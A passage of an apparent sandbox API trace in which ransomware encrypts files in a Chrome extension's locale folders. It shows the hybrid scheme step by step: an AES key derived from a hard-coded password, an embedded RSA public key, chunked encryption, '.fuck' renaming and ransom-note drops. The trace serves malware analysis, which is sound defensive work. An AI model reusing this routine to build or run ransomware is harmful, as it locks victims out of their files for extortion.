data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0264.388] AreFileApisANSI () returned 1 [0264.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.388] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.389] GetFileType (hFile=0x5d64) returned 0x1 [0264.389] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.390] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.390] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.390] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.390] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.390] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.391] GetLastError () returned 0x0 [0264.391] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json")) returned 0x20 [0264.391] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0264.392] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.393] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.393] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.394] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.395] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.395] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.396] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.396] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0264.396] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.396] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.396] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e764b8) returned 1 [0264.396] CryptImportPublicKeyInfo (in: hCryptProv=0x2e764b8, dwCertEncodingType=0x1, pInfo=0x2eafd90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eafdc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eafdc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ed40) returned 1 [0264.396] CryptEncrypt (in: hKey=0x2e7ed40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.396] CryptEncrypt (in: hKey=0x2e7ed40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76760*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e76760*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.396] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e76760*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e76760*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.397] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.399] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.399] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.404] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.404] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.404] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.404] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.404] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.405] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.405] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.405] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.405] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.405] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.405] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.406] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.406] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.406] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.406] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.406] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.406] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.407] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.407] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.407] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.407] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.407] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.407] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.407] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.407] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.407] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.407] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x36b, lpOverlapped=0x0) returned 1 [0264.407] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x36b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x370) returned 1 [0264.407] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x370, lpOverlapped=0x0) returned 1 [0264.407] CloseHandle (hObject=0x5d5c) returned 1 [0264.408] CloseHandle (hObject=0x5d60) returned 1 [0264.408] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0264.414] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0264.414] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0264.415] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0264.417] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.417] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0264.417] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.417] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.417] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.417] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0264.417] AreFileApisANSI () returned 1 [0264.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.417] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: 